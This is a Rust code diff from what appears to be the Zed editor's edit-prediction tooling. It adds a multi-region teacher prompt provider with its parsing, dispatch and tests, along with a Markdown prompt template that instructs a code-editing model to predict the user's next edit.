+ editable_region_start_line as u32,
+ editable_region_lines,
+ );
+
+ let diff = indoc::formatdoc! {"
+ --- a/{path}
+ +++ b/{path}
+ {diff}",
+ path = example.spec.cursor_path.to_string_lossy(),
+ diff = diff,
+ };
+
+ let actual_cursor = cursor_offset.map(|editable_region_cursor_offset| {
+ ActualCursor::from_editable_region(
+ &example.spec.cursor_path,
+ editable_region_cursor_offset,
+ &new_editable_region,
+ excerpt,
+ editable_region_offset,
+ editable_region_start_line,
+ )
+ });
+
+ Ok((diff, actual_cursor))
+ }
+
+ fn format_edit_history(edit_history: &str) -> String {
+ let lines: Vec<&str> = edit_history.lines().collect();
+
+ if lines.is_empty() {
+ return "(No edit history)".to_string();
+ }
+
+ if lines.len() > Self::MAX_HISTORY_LINES {
+ let truncated = lines[lines.len() - Self::MAX_HISTORY_LINES..].join("\n");
+ format!("{truncated}\n[...truncated...]")
+ } else {
+ lines.join("\n")
+ }
+ }
+
+ pub fn format_context(example: &Example) -> String {
+ let related_files = example
+ .prompt_inputs
+ .as_ref()
+ .and_then(|pi| pi.related_files.as_deref());
+ let Some(related_files) = related_files else {
+ return "(No context)".to_string();
+ };
+
+ if related_files.is_empty() {
+ return "(No context)".to_string();
+ }
+
+ let prefix = "`````";
+ let suffix = "`````\n\n";
+ let max_tokens = 1024;
+ zeta_prompt::format_related_files_within_budget(related_files, &prefix, &suffix, max_tokens)
+ }
+
+ fn format_cursor_excerpt(
+ example: &Example,
+ editable_range: Range<usize>,
+ context_range: Range<usize>,
+ ) -> String {
+ let mut result = String::new();
+
+ let prompt_inputs = example.prompt_inputs.as_ref().unwrap();
+ let excerpt = prompt_inputs.cursor_excerpt.as_ref();
+ let cursor_offset = prompt_inputs.cursor_offset_in_excerpt;
+
+ let editable_text = &excerpt[editable_range.clone()];
+ let cursor_in_editable = cursor_offset - editable_range.start;
+
+ let path_str = example.spec.cursor_path.to_string_lossy();
+ result.push_str(&format!("`````{path_str}\n"));
+
+ result.push_str(&excerpt[context_range.start..editable_range.start]);
+
+ multi_region::write_editable_with_markers(
+ &mut result,
+ editable_text,
+ cursor_in_editable,
+ Self::USER_CURSOR_MARKER,
+ );
+
+ result.push_str(&excerpt[editable_range.end..context_range.end]);
+ result.push_str("\n`````");
+
+ result
+ }
+}
+
/// Extract the cursor excerpt from an example.
/// First tries to extract from an existing prompt, then falls back to constructing from prompt_inputs.
pub fn extract_cursor_excerpt_from_example(example: &Example) -> Option<String> {
@@ -461,7 +736,7 @@ mod tests {
}
#[test]
- fn test_extract_editable_region() {
+ fn test_extract_editable_region_old_format() {
let text = indoc::indoc! {"
some lines
are
@@ -483,6 +758,38 @@ mod tests {
);
}
+ #[test]
+ fn test_extract_editable_region_marker_format() {
+ let text = indoc::indoc! {"
+ some context
+ <|marker_1|>
+ one
+ two three
+ <|marker_2|>
+ more context
+ "};
+ let parsed = multi_region::extract_editable_region_from_markers(text).unwrap();
+ assert_eq!(parsed, "one\ntwo three");
+ }
+
+ #[test]
+ fn test_extract_editable_region_multi_markers() {
+ let text = indoc::indoc! {"
+ prefix
+ <|marker_1|>
+ aaa
+ bbb
+ <|marker_2|>
+ ccc
+ ddd
+ <|marker_3|>
+ suffix
+ "};
+ let parsed = multi_region::extract_editable_region_from_markers(text).unwrap();
+ // Intermediate marker and its trailing \n are stripped
+ assert_eq!(parsed, "aaa\nbbb\nccc\nddd");
+ }
+
#[test]
fn test_extract_last_codeblock_nested_bibtex() {
let text = indoc::indoc! {r#"
@@ -582,4 +889,42 @@ mod tests {
let result = extract_last_codeblock(text).unwrap();
assert_eq!(result, "content here\n");
}
+
+ #[test]
+ fn test_parse_no_edits_response_with_trailing_backticks() {
+ let response = "NO_EDITS```";
+
+ let parsed = TeacherPrompt::parse(
+ &Example {
+ spec: edit_prediction::example_spec::ExampleSpec {
+ name: "test".to_string(),
+ repository_url: "https://github.com/zed-industries/zed.git".to_string(),
+ revision: "HEAD".to_string(),
+ tags: Vec::new(),
+ reasoning: None,
+ uncommitted_diff: String::new(),
+ cursor_path: std::sync::Arc::from(std::path::Path::new("src/main.rs")),
+ cursor_position: "0:0".to_string(),
+ edit_history: String::new(),
+ expected_patches: Vec::new(),
+ rejected_patch: None,
+ telemetry: None,
+ human_feedback: Vec::new(),
+ rating: None,
+ },
+ prompt_inputs: None,
+ prompt: None,
+ predictions: Vec::new(),
+ score: Vec::new(),
+ qa: Vec::new(),
+ zed_version: None,
+ state: None,
+ },
+ response,
+ )
+ .unwrap();
+
+ assert!(parsed.0.is_empty());
+ assert!(parsed.1.is_none());
+ }
}
@@ -1,4 +1,5 @@
use client::{Client, ProxySettings, UserStore};
+use db::AppDatabase;
use extension::ExtensionHostProxy;
use fs::RealFs;
use gpui::http_client::read_proxy_from_env;
@@ -61,6 +62,9 @@ pub fn init(cx: &mut App) -> EpAppState {
let client = Client::production(cx);
cx.set_http_client(client.http_client());
+ let app_db = AppDatabase::new();
+ cx.set_global(app_db);
+
let git_binary_path = None;
let fs = Arc::new(RealFs::new(
git_binary_path,
@@ -360,7 +360,9 @@ enum PredictionProvider {
Zeta2(ZetaFormat),
Baseten(ZetaFormat),
Teacher(TeacherBackend),
+ TeacherMultiRegion(TeacherBackend),
TeacherNonBatching(TeacherBackend),
+ TeacherMultiRegionNonBatching(TeacherBackend),
Repair,
}
@@ -379,9 +381,15 @@ impl std::fmt::Display for PredictionProvider {
PredictionProvider::Zeta2(format) => write!(f, "zeta2:{format}"),
PredictionProvider::Baseten(format) => write!(f, "baseten:{format}"),
PredictionProvider::Teacher(backend) => write!(f, "teacher:{backend}"),
+ PredictionProvider::TeacherMultiRegion(backend) => {
+ write!(f, "teacher-multi-region:{backend}")
+ }
PredictionProvider::TeacherNonBatching(backend) => {
write!(f, "teacher-non-batching:{backend}")
}
+ PredictionProvider::TeacherMultiRegionNonBatching(backend) => {
+ write!(f, "teacher-multi-region-non-batching:{backend}")
+ }
PredictionProvider::Repair => write!(f, "repair"),
}
}
@@ -409,13 +417,27 @@ impl std::str::FromStr for PredictionProvider {
.unwrap_or(TeacherBackend::default());
Ok(PredictionProvider::Teacher(backend))
}
- "teacher-non-batching" | "teacher_non_batching" | "teachernonbatching" => {
+ "teacher-multi-region" | "teacher_multi_region" => {
+ let backend = arg
+ .map(|a| a.parse())
+ .transpose()?
+ .unwrap_or(TeacherBackend::default());
+ Ok(PredictionProvider::TeacherMultiRegion(backend))
+ }
+ "teacher-non-batching" | "teacher_non_batching" => {
let backend = arg
.map(|a| a.parse())
.transpose()?
.unwrap_or(TeacherBackend::default());
Ok(PredictionProvider::TeacherNonBatching(backend))
}
+ "teacher-multi-region-non-batching" | "teacher_multi_region_non_batching" => {
+ let backend = arg
+ .map(|a| a.parse())
+ .transpose()?
+ .unwrap_or(TeacherBackend::default());
+ Ok(PredictionProvider::TeacherMultiRegionNonBatching(backend))
+ }
"repair" => Ok(PredictionProvider::Repair),
"baseten" => {
let format = arg
@@ -426,9 +448,9 @@ impl std::str::FromStr for PredictionProvider {
}
_ => {
anyhow::bail!(
- "unknown provider `{provider}`. Valid options: sweep, mercury, zeta1, zeta2, zeta2:<version>, teacher, teacher:<backend>, teacher-non-batching, repair\n\
+ "unknown provider `{provider}`. Valid options: sweep, mercury, zeta1, zeta2, zeta2:<version>, teacher, teacher:<backend>, teacher-multi-region, teacher-multi-region:<backend>, teacher-non-batching, teacher-multi-region-non-batching, repair\n\
For zeta2, you can optionally specify a version like `zeta2:ordered` or `zeta2:V0113_Ordered`.\n\
- For teacher, you can specify a backend like `teacher:sonnet46` or `teacher:gpt52`.\n\
+ For teacher providers, you can specify a backend like `teacher:sonnet46`, `teacher-multi-region:sonnet46`, `teacher-multi-region-non-batching:sonnet46`, or `teacher:gpt52`.\n\
Available zeta versions:\n{}",
ZetaFormat::options_as_string()
)
@@ -491,6 +513,40 @@ enum BatchProvider {
Openai,
}
+#[cfg(test)]
+mod tests {
+ use super::*;
+
+ #[test]
+ fn prediction_provider_multi_region_non_batched_round_trips_to_primary_spelling() {
+ let provider: PredictionProvider = "teacher-multi-region-non-batching:sonnet46"
+ .parse()
+ .unwrap();
+ assert_eq!(
+ provider,
+ PredictionProvider::TeacherMultiRegionNonBatching(TeacherBackend::Sonnet46)
+ );
+ assert_eq!(
+ provider.to_string(),
+ "teacher-multi-region-non-batching:sonnet46"
+ );
+ }
+
+ #[test]
+ fn prediction_provider_multi_region_non_batched_alias_round_trips_to_primary_spelling() {
+ let provider: PredictionProvider =
+ "teacher_multi_region_non_batching:gpt52".parse().unwrap();
+ assert_eq!(
+ provider,
+ PredictionProvider::TeacherMultiRegionNonBatching(TeacherBackend::Gpt52)
+ );
+ assert_eq!(
+ provider.to_string(),
+ "teacher-multi-region-non-batching:gpt52"
+ );
+ }
+}
+
impl EpArgs {
fn output_path(&self) -> Option<PathBuf> {
if self.in_place {
@@ -40,6 +40,7 @@ impl PlainOpenAiClient {
model: model.to_string(),
messages,
stream: false,
+ stream_options: None,
max_completion_tokens: Some(max_tokens),
stop: Vec::new(),
temperature: None,
@@ -490,6 +491,7 @@ impl BatchingOpenAiClient {
model: serializable_request.model,
messages,
stream: false,
+ stream_options: None,
max_completion_tokens: Some(serializable_request.max_tokens),
stop: Vec::new(),
temperature: None,
@@ -1,7 +1,7 @@
use crate::{
PredictionProvider,
example::{ActualCursor, Example},
- format_prompt::TeacherPrompt,
+ format_prompt::{TeacherMultiRegionPrompt, TeacherPrompt},
repair,
};
use anyhow::{Context as _, Result};
@@ -41,6 +41,10 @@ pub fn parse_prediction_output(
PredictionProvider::Teacher(_) | PredictionProvider::TeacherNonBatching(_) => {
TeacherPrompt::parse(example, actual_output)
}
+ PredictionProvider::TeacherMultiRegion(_)
+ | PredictionProvider::TeacherMultiRegionNonBatching(_) => {
+ TeacherMultiRegionPrompt::parse(example, actual_output)
+ }
PredictionProvider::Zeta2(version) => parse_zeta2_output(example, actual_output, version),
PredictionProvider::Repair => repair::parse(example, actual_output),
_ => anyhow::bail!(
@@ -2,7 +2,7 @@ use crate::{
FormatPromptArgs, PredictArgs, PredictionProvider, TeacherBackend,
anthropic_client::AnthropicClient,
example::{Example, ExamplePrediction, ExamplePrompt},
- format_prompt::{TeacherPrompt, run_format_prompt},
+ format_prompt::{TeacherMultiRegionPrompt, TeacherPrompt, run_format_prompt},
headless::EpAppState,
load_project::run_load_project,
openai_client::OpenAiClient,
@@ -57,8 +57,10 @@ pub async fn run_prediction(
);
};
- if let PredictionProvider::Teacher(backend) | PredictionProvider::TeacherNonBatching(backend) =
- provider
+ if let PredictionProvider::Teacher(backend)
+ | PredictionProvider::TeacherMultiRegion(backend)
+ | PredictionProvider::TeacherNonBatching(backend)
+ | PredictionProvider::TeacherMultiRegionNonBatching(backend) = provider
{
run_context_retrieval(example, app_state.clone(), example_progress, cx.clone()).await?;
run_format_prompt(
@@ -71,7 +73,10 @@ pub async fn run_prediction(
.await?;
let step_progress = example_progress.start(Step::Predict);
- let batched = matches!(provider, PredictionProvider::Teacher(..));
+ let batched = matches!(
+ provider,
+ PredictionProvider::Teacher(..) | PredictionProvider::TeacherMultiRegion(..)
+ );
return predict_teacher(
example,
backend,
@@ -135,7 +140,9 @@ pub async fn run_prediction(
PredictionProvider::Sweep => edit_prediction::EditPredictionModel::Sweep,
PredictionProvider::Mercury => edit_prediction::EditPredictionModel::Mercury,
PredictionProvider::Teacher(..)
+ | PredictionProvider::TeacherMultiRegion(..)
| PredictionProvider::TeacherNonBatching(..)
+ | PredictionProvider::TeacherMultiRegionNonBatching(..)
| PredictionProvider::Repair
| PredictionProvider::Baseten(_) => {
unreachable!()
@@ -256,6 +263,8 @@ pub async fn run_prediction(
actual_cursor: None,
error: None,
provider,
+ cumulative_logprob: None,
+ avg_logprob: None,
});
step_progress.set_substatus("requesting prediction");
@@ -403,7 +412,29 @@ async fn predict_anthropic(
.collect::<Vec<String>>()
.join("\n");
- let (actual_patch, actual_cursor) = TeacherPrompt::parse(example, &actual_output)?;
+ let parser_provider = if batched {
+ example
+ .prompt
+ .as_ref()
+ .map(|prompt| prompt.provider)
+ .unwrap_or(PredictionProvider::Teacher(backend))
+ } else {
+ match example.prompt.as_ref().map(|prompt| prompt.provider) {
+ Some(PredictionProvider::TeacherMultiRegion(_))
+ | Some(PredictionProvider::TeacherMultiRegionNonBatching(_)) => {
+ PredictionProvider::TeacherMultiRegionNonBatching(backend)
+ }
+ _ => PredictionProvider::TeacherNonBatching(backend),
+ }
+ };
+
+ let (actual_patch, actual_cursor) = match parser_provider {
+ PredictionProvider::TeacherMultiRegion(_)
+ | PredictionProvider::TeacherMultiRegionNonBatching(_) => {
+ TeacherMultiRegionPrompt::parse(example, &actual_output)?
+ }
+ _ => TeacherPrompt::parse(example, &actual_output)?,
+ };
let prediction = ExamplePrediction {
actual_patch: Some(actual_patch),
@@ -411,10 +442,23 @@ async fn predict_anthropic(
actual_cursor,
error: None,
provider: if batched {
- PredictionProvider::Teacher(backend)
+ match example.prompt.as_ref().map(|prompt| prompt.provider) {
+ Some(PredictionProvider::TeacherMultiRegion(_)) => {
+ PredictionProvider::TeacherMultiRegion(backend)
+ }
+ _ => PredictionProvider::Teacher(backend),
+ }
} else {
- PredictionProvider::TeacherNonBatching(backend)
+ match example.prompt.as_ref().map(|prompt| prompt.provider) {
+ Some(PredictionProvider::TeacherMultiRegion(_))
+ | Some(PredictionProvider::TeacherMultiRegionNonBatching(_)) => {
+ PredictionProvider::TeacherMultiRegionNonBatching(backend)
+ }
+ _ => PredictionProvider::TeacherNonBatching(backend),
+ }
},
+ cumulative_logprob: None,
+ avg_logprob: None,
};
example.predictions.push(prediction);
@@ -487,7 +531,29 @@ async fn predict_openai(
.collect::<Vec<String>>()
.join("\n");
- let (actual_patch, actual_cursor) = TeacherPrompt::parse(example, &actual_output)?;
+ let parser_provider = if batched {
+ example
+ .prompt
+ .as_ref()
+ .map(|prompt| prompt.provider)
+ .unwrap_or(PredictionProvider::Teacher(backend))
+ } else {
+ match example.prompt.as_ref().map(|prompt| prompt.provider) {
+ Some(PredictionProvider::TeacherMultiRegion(_))
+ | Some(PredictionProvider::TeacherMultiRegionNonBatching(_)) => {
+ PredictionProvider::TeacherMultiRegionNonBatching(backend)
+ }
+ _ => PredictionProvider::TeacherNonBatching(backend),
+ }
+ };
+
+ let (actual_patch, actual_cursor) = match parser_provider {
+ PredictionProvider::TeacherMultiRegion(_)
+ | PredictionProvider::TeacherMultiRegionNonBatching(_) => {
+ TeacherMultiRegionPrompt::parse(example, &actual_output)?
+ }
+ _ => TeacherPrompt::parse(example, &actual_output)?,
+ };
let prediction = ExamplePrediction {
actual_patch: Some(actual_patch),
@@ -495,10 +561,23 @@ async fn predict_openai(
actual_cursor,
error: None,
provider: if batched {
- PredictionProvider::Teacher(backend)
+ match example.prompt.as_ref().map(|prompt| prompt.provider) {
+ Some(PredictionProvider::TeacherMultiRegion(_)) => {
+ PredictionProvider::TeacherMultiRegion(backend)
+ }
+ _ => PredictionProvider::Teacher(backend),
+ }
} else {
- PredictionProvider::TeacherNonBatching(backend)
+ match example.prompt.as_ref().map(|prompt| prompt.provider) {
+ Some(PredictionProvider::TeacherMultiRegion(_))
+ | Some(PredictionProvider::TeacherMultiRegionNonBatching(_)) => {
+ PredictionProvider::TeacherMultiRegionNonBatching(backend)
+ }
+ _ => PredictionProvider::TeacherNonBatching(backend),
+ }
},
+ cumulative_logprob: None,
+ avg_logprob: None,
};
example.predictions.push(prediction);
@@ -583,6 +662,8 @@ pub async fn predict_baseten(
actual_cursor,
error: None,
provider: PredictionProvider::Baseten(format),
+ cumulative_logprob: None,
+ avg_logprob: None,
};
example.predictions.push(prediction);
@@ -591,7 +672,8 @@ pub async fn predict_baseten(
pub async fn sync_batches(provider: Option<&PredictionProvider>) -> anyhow::Result<()> {
match provider {
- Some(PredictionProvider::Teacher(backend)) => match backend {
+ Some(PredictionProvider::Teacher(backend))
+ | Some(PredictionProvider::TeacherMultiRegion(backend)) => match backend {
TeacherBackend::Sonnet45 | TeacherBackend::Sonnet46 => {
let llm_client = ANTHROPIC_CLIENT.get_or_init(|| {
AnthropicClient::batch(&crate::paths::LLM_CACHE_DB)
@@ -0,0 +1,366 @@
+# Instructions
+
+You are an edit prediction assistant in a code editor. Your task is to predict the next edit to a given region of code surrounding the user's cursor.
+
+1. Analyze the edit history to understand what the programmer is trying to achieve
+2. Identify any incomplete refactoring or changes that need to be finished
+3. Make the remaining edits that a human programmer would logically make next (by rewriting a region of code near their cursor)
+
+## Focus on
+
+- Completing any partially-applied changes the user has made
+- Ensuring consistency with the programming style and patterns already established
+- Making edits that maintain or improve code quality
+
+## Rules
+
+- **NEVER undo or revert the user's recent edits.** Examine the diff in the edit history carefully:
+ - If a line was removed (starts with `-`), do NOT restore that content—even if the code now appears incomplete or broken without it
+ - If a line was added (starts with `+`), do NOT delete or significantly modify it
+ - If code appears broken or incomplete after the user's edit, output `NO_EDITS` rather than "fixing" it by reverting
+ - Only add NEW content that extends the user's work forward; never restore what they removed
+ - **Key test**: if your prediction would make the code more similar to what it was BEFORE the user's edit, output `NO_EDITS` instead
+ - **Never assume a deletion was accidental.** Even if removing content breaks the code, breaks a pattern, or leaves text looking "incomplete", respect it. The user may be mid-rewrite. Do NOT "complete" partial text by restoring what was deleted.
+- Auto-generated code can be modified: Hunks marked with `// User accepted prediction:` contain code from a previous prediction the user accepted. Unlike user-typed content, these hunks CAN be edited, corrected, or replaced if it improves the code. The "never undo/revert" rule protects the user's *current typing intent*—auto-generated code doesn't carry this protection
+- Do not just mechanically apply patterns - reason about what changes make sense given the context and the programmer's apparent goals.
+- Do not just fix syntax errors - look for the broader refactoring pattern and apply it systematically throughout the code.
+- Keep existing formatting unless changing it is absolutely necessary
+- When edit history and surrounding code suggest different edits, prioritize the most recent edits in the history as they best reflect current intent.
+- Treat partial text at or near the cursor as the beginning of something the user is actively typing. Complete the code the user appears to be creating based on context.
+- When completing partial code, prefer predictions that save meaningful keystrokes, even if this requires making educated guesses about the user's intent.
+- For code, it's better to make a substantive prediction that might be rejected than to make a minimal prediction that saves only a few keystrokes.
+- When the user is editing prose or documentation (e.g. Markdown, comments, plain text), predict conservatively. Complete the current fragment or sentence, but do not generate additional lines of free-form content since prose is less constrained than code and more prone to incorrect continuations.
+
+# Input Format
+
+You will be provided with:
+1. The user's *edit history*, in chronological order. Use this to infer the user's trajectory and predict the next most logical edit.
+ - Hunks preceded by `// User accepted prediction:` indicate code that was auto-generated by a previous prediction and accepted by the user. These are treated differently than user-typed edits (see Rules).
+2. A set of *related excerpts* from the user's codebase. Some of these may be needed for correctly predicting the next edit.
+ - `…` may appear within a related file to indicate that some code has been skipped.
+3. An excerpt from the user's *current file*.
+ - The excerpt contains numbered *marker* tags (`<|marker_1|>`, `<|marker_2|>`, etc.) placed at block boundaries throughout the code. These markers divide the excerpt into spans that you can target for editing.
+ - Code that appears before the first marker or after the last marker is read-only context and cannot be edited.
+ - The `<|user_cursor|>` tag marks the user's current cursor position, as it stands after the last edit in the history.
+
+# Output Format
+
+- Briefly explain the user's current intent based on the edit history and their current cursor location.
+- Output a markdown codeblock containing your predicted edit as a **marker-bounded span**:
+ - The codeblock must **start** with a marker tag (e.g. `<|marker_2|>`) and **end** with a marker tag (e.g. `<|marker_4|>`).
+ - The content between these two markers is the full replacement for that span in the original file.
+ - Choose the **narrowest** pair of markers that fully contains your predicted edits, to minimize unnecessary output.
+ - Reproduce any unchanged lines within the chosen span faithfully — do not omit or alter them.
+ - Do not include any intermediate marker tags in your output — only the start and end markers.
+- If no edit is needed (the code is already complete and correct, or there is no clear next edit to make), output a codeblock containing only `NO_EDITS`:
+ `````
+ NO_EDITS
+ `````
+- If there is a specific place in the predicted output where the user is likely to edit next, indicate it using the `<|user_cursor|>` tag.
+
+## Example 1
+
+There is code missing at the cursor location. The related excerpts include the definition of a relevant type. You should fill in the missing code.
+
+### Related Excerpts
+
+`````
+struct Product {
+ name: String,
+ price: u32,
+}
+`````
+
+### User Edit History
+
+`````
+--- a/src/calculate.rs
++++ b/src/calculate.rs
+@@ -100,6 +100,7 @@
+ fn calculate_total(products: &[Product]) -> u32 {
+ let mut total = 0;
+ for product in products {
++ total += ;
+ }
+ total
+ }
+`````
+
+### Current File
+
+`````src/calculate.rs
+fn calculate_total(products: &[Product]) -> u32 {
+<|marker_1|>
+ let mut total = 0;
+ for product in products {
+ total += <|user_cursor|>;
+ }
+ total
+<|marker_2|>
+}
+`````
+
+### Output
+
+The user is computing a sum based on a list of products. The only numeric field on `Product` is `price`, so they must intend to sum the prices.
+
+`````
+<|marker_1|>
+ let mut total = 0;
+ for product in products {
+ total += product.price;
+ }
+ total
+<|marker_2|>
+`````
+
+## Example 2
+
+The user appears to be in the process of typing an eprintln call. Rather than fixing the spelling issue by deleting the newly-inserted content, you must continue the user's trajectory. It's not clear what data they intend to print. You should fill in as much code as is obviously intended, and position the cursor so that the user can fill in the rest.
+
+### User Edit History
+
+`````
+--- a/src/modal.rs
++++ b/src/modal.rs
+@@ -100,4 +100,4 @@
+ fn handle_close_button_click(modal_state: &mut ModalState, evt: &Event) {
+ modal_state.close();
+- modal_state.dismiss();
++ eprmodal_state.dismiss();
+ }
+`````
+
+### Current File
+
+`````src/modal.rs
+<|marker_1|>
+// handle the close button click
+fn handle_close_button_click(modal_state: &mut ModalState, evt: &Event) {
+<|marker_2|>
+ modal_state.close();
+ epr<|user_cursor|>modal_state.dismiss();
+}
+<|marker_3|>
+`````
+
+### Output
+
+The user is clearly starting to type `eprintln!()`, however, what they intend to print is not obvious. I should fill in the print call and string literal, with the cursor positioned inside the string literal so the user can print whatever they want.
+
+`````
+<|marker_2|>
+ modal_state.close();
+ eprintln!("<|user_cursor|>");
+ modal_state.dismiss();
+}
+<|marker_3|>
+`````
+
+## Example 3
+
+Here, the user is adding a function. There's no way to tell for sure what the function's name will be. In this situation, you should make a reasonable guess at the function's name and signature, and place the user's cursor in the function body. This way, if you guess correctly, it will save the user a meaningful number of keystrokes, and the file will be left in a coherent state.
+
+### User Edit History
+
+`````
+--- a/src/modal.rs
++++ b/src/modal.rs
+@@ -100,4 +100,4 @@
+ fn handle_close_button_click(modal_state: &mut ModalState, evt: &Event) {
+ modal_state.close();
+ modal_state.dismiss();
+ }
++
++fn
+
+ fn handle_keystroke(modal_state: &mut ModalState, evt: &Event) {
+`````
+
+### Current File
+
+`````src/modal.rs
+// handle the close button click
+fn handle_close_button_click(modal_state: &mut ModalState, evt: &Event) {
+ modal_state.close();
+<|marker_1|>
+ modal_state.dismiss();
+}
+
+fn<|user_cursor|>
+
+<|marker_2|>
+fn handle_keystroke(modal_state: &mut ModalState, evt: &Event) {
+ modal_state.begin_edit();
+<|marker_3|>
+`````
+
+### Output
+
+The user is adding a new function. The existing functions I see are `handle_close_button_click` and `handle_keystroke`, which have similar signatures. One possible function they might be adding is `handle_submit`.
+
+`````
+<|marker_1|>
+ modal_state.dismiss();
+}
+
+fn handle_submit(modal_state: &mut ModalState, evt: &Event) {
+ <|user_cursor|>
+}
+
+<|marker_2|>
+`````
+
+## Example 4
+
+The code is already complete and there is no clear next edit to make. You should output NO_EDITS.
+
+### User Edit History
+
+`````
+--- a/src/utils.rs
++++ b/src/utils.rs
+@@ -10,7 +10,7 @@
+ fn add(a: i32, b: i32) -> i32 {
+- a - b
++ a + b
+ }
+`````
+
+### Current File
+
+`````src/utils.rs
+<|marker_1|>
+fn add(a: i32, b: i32) -> i32 {
+ a + b<|user_cursor|>
+}
+<|marker_2|>
+`````
+
+### Output
+
+The user just fixed a bug in the `add` function, changing subtraction to addition. The code is now correct and complete. There is no clear next edit to make.
+
+`````
+NO_EDITS
+`````
+
+## Example 5
+
+The user just deleted code, leaving behind what looks incomplete. You must NOT "complete" it by restoring deleted content—that would undo their edit. Output NO_EDITS. **This is the correct response even though the code appears broken.**
+
+### User Edit History
+
+`````
+--- a/config.nix
++++ b/config.nix
+@@ -10,7 +10,7 @@
+ # /etc/modular/crashdb needs to be mutable
+- ln -s /tmp/crashdb $out/etc/modular/crashdb
++ ln -s /tmp/cr $out/etc/modular/crashdb
+ '';
+`````
+
+### Current File
+
+`````config.nix
+<|marker_1|>
+ # /etc/modular/crashdb needs to be mutable
+ ln -s /tmp/cr<|user_cursor|> $out/etc/modular/crashdb
+ '';
+<|marker_2|>
+`````
+
+### Output
+
+The user deleted `ashdb` from `/tmp/crashdb`, leaving `/tmp/cr`. Although this looks like incomplete text that I could "complete", doing so would restore deleted content. The user intentionally removed that text—I must not undo their deletion.
+
+`````
+NO_EDITS
+`````
+
+## Example 6
+
+The user accepted a prediction for a function, then started renaming it. The original arguments were auto-generated (marked with `// User accepted prediction:`), so they CAN be updated to match the new function name. This is NOT reverting user input—it's improving auto-generated scaffolding.
+
+### User Edit History
+
+`````
+--- a/math_utils.py
++++ b/math_utils.py
+@@ -3,3 +3,5 @@
+ def calculate_rectangle_area(width, height):
+ return width * height
+
+
++de
+
+// User accepted prediction:
+--- a/math_utils.py
++++ b/math_utils.py
+@@ -3,5 +3,7 @@
+ def calculate_rectangle_area(width, height):
+ return width * height
+
+-de
++def calculate_rectangle_perimeter(width, height):
++
+
+--- a/math_utils.py
++++ b/math_utils.py
+@@ -5,5 +5,5 @@
+ return width * height
+
+-def calculate_rectangle_perimeter(width, height):
++def calculate_sq_perimeter(width, height):
+
+`````
+
+### Current File
+
+`````math_utils.py
+<|marker_1|>
+def calculate_rectangle_area(width, height):
+ return width * height
+
+<|marker_2|>
+def calculate_sq<|user_cursor|>_perimeter(width, height):
+
+<|marker_3|>
+`````
+
+### Output
+
+The user accepted a prediction for `calculate_rectangle_perimeter(width, height)`, then started renaming `rectangle` to `square`. Since squares have equal sides, the arguments should change from `(width, height)` to `(side)`. The arguments were auto-generated (from an accepted prediction), so modifying them is appropriate.
+
+`````
+<|marker_2|>
+def calculate_square_perimeter(side):
+ <|user_cursor|>
+<|marker_3|>
+`````
+
+
+
+# Your task:
+
+# 1. User Edit History
+
+`````
+{{edit_history}}
+`````
+
+# 2. Related excerpts
+
+{{context}}
+
+# 3. Current File
+
+{{cursor_excerpt}}
+
+
+
+
+-----
+
+Based on the edit history and context above, predict the user's next edit within the marker-bounded spans.
@@ -10,7 +10,7 @@ use crate::{
BatchProvider, PredictionProvider,
anthropic_client::AnthropicClient,
example::{ActualCursor, Example, ExamplePrediction},
- format_prompt::{TeacherPrompt, extract_last_codeblock},
+ format_prompt::TeacherPrompt,
metrics::count_patch_token_changes,
openai_client::OpenAiClient,
parse_output::run_parse_output,
@@ -227,10 +227,7 @@ pub fn needs_repair(example: &Example, confidence_threshold: u8) -> bool {
/// Handles the `KEEP_PREVIOUS` sentinel by copying the teacher's prediction,
/// and delegates normal output to `TeacherPrompt::parse`.
pub fn parse(example: &Example, actual_output: &str) -> Result<(String, Option<ActualCursor>)> {
- let last_codeblock =
- extract_last_codeblock(actual_output).unwrap_or_else(|| actual_output.to_string());
-
- if last_codeblock.contains(KEEP_PREVIOUS) {
+ if actual_output.contains(KEEP_PREVIOUS) {
let original = example
.predictions
.first()
@@ -426,6 +423,8 @@ pub async fn run_repair(
actual_cursor,
error: err,
provider: PredictionProvider::Repair,
+ cumulative_logprob: None,
+ avg_logprob: None,
});
Ok(())
@@ -454,3 +453,71 @@ pub async fn sync_batches(args: &RepairArgs) -> Result<()> {
Ok(())
}
+
+#[cfg(test)]
+mod tests {
+ use super::*;
+ use crate::{PredictionProvider, TeacherBackend};
+ use edit_prediction::example_spec::ExampleSpec;
+ use std::{path::Path, sync::Arc};
+
+ fn example_with_previous_prediction() -> Example {
+ Example {
+ spec: ExampleSpec {
+ name: "example".to_string(),
+ repository_url: "https://github.com/zed-industries/zed.git".to_string(),
+ revision: "HEAD".to_string(),
+ tags: Vec::new(),
+ reasoning: None,
+ uncommitted_diff: String::new(),
+ cursor_path: Arc::from(Path::new("src/main.rs")),
+ cursor_position: "0:0".to_string(),
+ edit_history: String::new(),
+ expected_patches: Vec::new(),
+ rejected_patch: None,
+ telemetry: None,
+ human_feedback: Vec::new(),
+ rating: None,
+ },
+ prompt_inputs: None,
+ prompt: None,
+ predictions: vec![ExamplePrediction {
+ actual_patch: Some("previous patch".to_string()),
+ actual_output: String::new(),
+ actual_cursor: Some(ActualCursor {
+ path: "src/main.rs".to_string(),
+ row: 1,
+ column: 2,
+ offset: 3,
+ editable_region_offset: Some(4),
+ }),
+ error: None,
+ provider: PredictionProvider::Teacher(TeacherBackend::Sonnet45),
+ cumulative_logprob: None,
+ avg_logprob: None,
+ }],
+ score: Vec::new(),
+ qa: Vec::new(),
+ zed_version: None,
+ state: None,
+ }
+ }
+
+ #[test]
+ fn test_parse_keeps_previous_when_sentinel_appears_outside_last_codeblock() {
+ let example = example_with_previous_prediction();
+ let actual_output = indoc::indoc! {"
+ After reviewing the feedback, the previous prediction is still correct.
+ Use `KEEP_PREVIOUS`.
+
+ ```
+ unrelated trailing code block
+ ```
+ "};
+
+ let (patch, cursor) = parse(&example, actual_output).unwrap();
+
+ assert_eq!(patch, "previous patch");
+ assert_eq!(cursor.unwrap().offset, 3);
+ }
+}
@@ -78,6 +78,8 @@ pub async fn run_scoring(
has_isolated_whitespace_changes: false,
inserted_tokens: 0,
deleted_tokens: 0,
+ cumulative_logprob: None,
+ avg_logprob: None,
};
let cursor_path = example.spec.cursor_path.as_ref();
@@ -189,6 +191,8 @@ pub async fn run_scoring(
has_isolated_whitespace_changes,
inserted_tokens: token_changes.inserted_tokens,
deleted_tokens: token_changes.deleted_tokens,
+ cumulative_logprob: prediction.cumulative_logprob,
+ avg_logprob: prediction.avg_logprob,
});
}
@@ -1028,6 +1028,7 @@ fn assert_related_files_impl(
